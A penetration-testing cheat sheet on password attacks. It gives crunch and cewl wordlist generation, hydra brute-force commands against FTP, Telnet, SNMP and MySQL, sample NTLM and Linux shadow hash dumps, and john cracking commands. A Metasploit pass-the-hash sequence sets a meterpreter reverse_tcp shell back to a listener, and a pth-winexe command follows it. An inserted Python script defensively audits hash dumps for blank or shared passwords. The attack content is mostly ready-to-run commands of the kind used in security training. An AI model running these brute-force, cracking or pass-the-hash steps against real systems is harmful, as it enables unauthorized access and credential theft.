# Password Attacks

### Password Generation

#### Custom

```bash
# Basic Syntax
crunch {min} {max} {characters} -o {outputFile}
crunch 4 6 0123456789ABCDEF -o crunch1.txt
crunch 6 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch2.txt

# Generate Specific Passwords (-t pattern placeholders)
# , => upper
# @ => lower
# ^ => special char
# % => number
crunch 8 8 -t ,@@@@^%%
```

#### Profiling

```bash
cewl -d 1 -m 5 --with-numbers -v -w passcewl.txt https://www.google.com
```

### Online Attack

```bash
# FTP
hydra -V -L users.txt -P pass.txt -t 20 192.168.1.104 ftp
hydra -V -L users.txt -e nsr -t 20 192.168.100.31 ftp
hydra -V -L users.txt -P pass.txt -e nsr -t 20 192.168.100.31 ftp

# Telnet
hydra -V -L users.txt -P pass.txt -t 10 192.168.1.104 telnet

# SNMP
hydra -V -P pass.txt 192.168.1.244 snmp

# MYSQL
hydra -V -L users.txt -P pass.txt -t 10 192.168.1.104 mysql
hydra -V -L users.txt -p "" -t 10 192.168.1.104 mysql
```

### Offline Attack

#### Hash Examples

```bash
# MD5
user1:827ccb0eea8a706c4c34a16891f84e7b
user2:e988532b766b8272ad0ee62911bffce4

# Windows NTLM & LM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:3a0842db8bfe9eddd03f8f5017348cc8:::
test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test123:1008:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
student123:1005:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Student:1000:AAD3B435B51404EEAAD3B435B51404EE:EAB4556003A83E179A149CE6583E097F:::
test1234:1001:aad3b435b51404eeaad3b435b51404ee:3b1b47e42e0463276e3ded6cef349f93:::

# Linux Hash SHA-512
root:$6$.M0YwYN9$1grnLORHHShGJ5CnNS7gjMYAwPs7sDRdeMJ7HEUeuvgKEBdJ5VGYk866IRDHQE0bM.ou0qlGQhPpCzq46emjL0:17996:0:99999:7:::
test:$6$.Nyrlw0pwMxGTBwI$gQ4jC3D8v7ubCDuAIGsjGqmxLP2/0bC.3FFK2FDDTrZGLa3A7WRBPAHSD5gvz.IZ2wgtAijtiQ3r8hriTG79/.:18003:0:99999:7:::
```
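
An added example, not part of the original page: a small audit script for the `user:rid:lm:nt:::` format shown above, reporting accounts whose NT hash is that of the empty string, accounts that still store a real LM hash, and accounts sharing one NT hash. The function names and the two `svc_*` accounts are assumptions made for this example; their hash pair is the one that appears in the page's Metasploit command.

```python
import string
from collections import defaultdict

# Well-known values: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# The first seven lines are copied from the sample block above; the two
# svc_* accounts are constructed for this example.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:3a0842db8bfe9eddd03f8f5017348cc8:::
test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test123:1008:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
student123:1005:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Student:1000:AAD3B435B51404EEAAD3B435B51404EE:EAB4556003A83E179A149CE6583E097F:::
svc_backup:1101:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
svc_web:1102:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""

def _is_hash(field):
    """True for a 32-character hex string (the size of an LM or NT hash)."""
    return len(field) == 32 and all(c in string.hexdigits for c in field)

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) per user:rid:lm:nt::: line, hashes lowercased."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # not a pwdump-style record
        if not (_is_hash(parts[2]) and _is_hash(parts[3])):
            continue  # malformed hash fields
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()

def audit(text):
    """Report blank passwords, stored LM hashes and NT hashes shared by accounts."""
    blank, lm_stored, by_nt = [], [], defaultdict(list)
    for user, _rid, lm, nt in parse_pwdump(text):
        if nt == EMPTY_NT:
            blank.append(user)      # NT hash of the empty string: no password set
        else:
            by_nt[nt].append(user)  # NT hashes are unsalted: same hash, same password
        if lm != EMPTY_LM:
            lm_stored.append(user)  # a real LM hash is stored for this account
    shared = [sorted(users) for users in by_nt.values() if len(users) > 1]
    return {"blank_password": blank, "lm_stored": lm_stored, "shared_hash": shared}

if __name__ == "__main__":
    for finding, accounts in audit(SAMPLE).items():
        print(finding, accounts)
```

Hashes are compared case-insensitively, so the `Student` line with its uppercase LM field is correctly treated as having no stored LM hash.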

#### Hash Cracking

```bash
# Linux Hash Formats
john --format=md5crypt hashes.txt # md5 $1
john --format=sha256crypt hashes.txt # sha-256 $5
john --format=sha512crypt hashes.txt # sha-512 $6

# Windows Hash Formats
john --format=LM hashes.txt #LM
john --format=NT hashes.txt #NT

# Normal md5
john --format=raw-MD5 hashes.txt

# Crack using custom wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-MD5 hashes.txt
```

### Pass The Hash

```bash
# Metasploit
msfconsole
> use exploit/windows/smb/psexec
> set RHOST 192.168.57.131
> set SMBUser administrator
> set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.57.133
> set LPORT 4444
> exploit

# PTH
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd
```

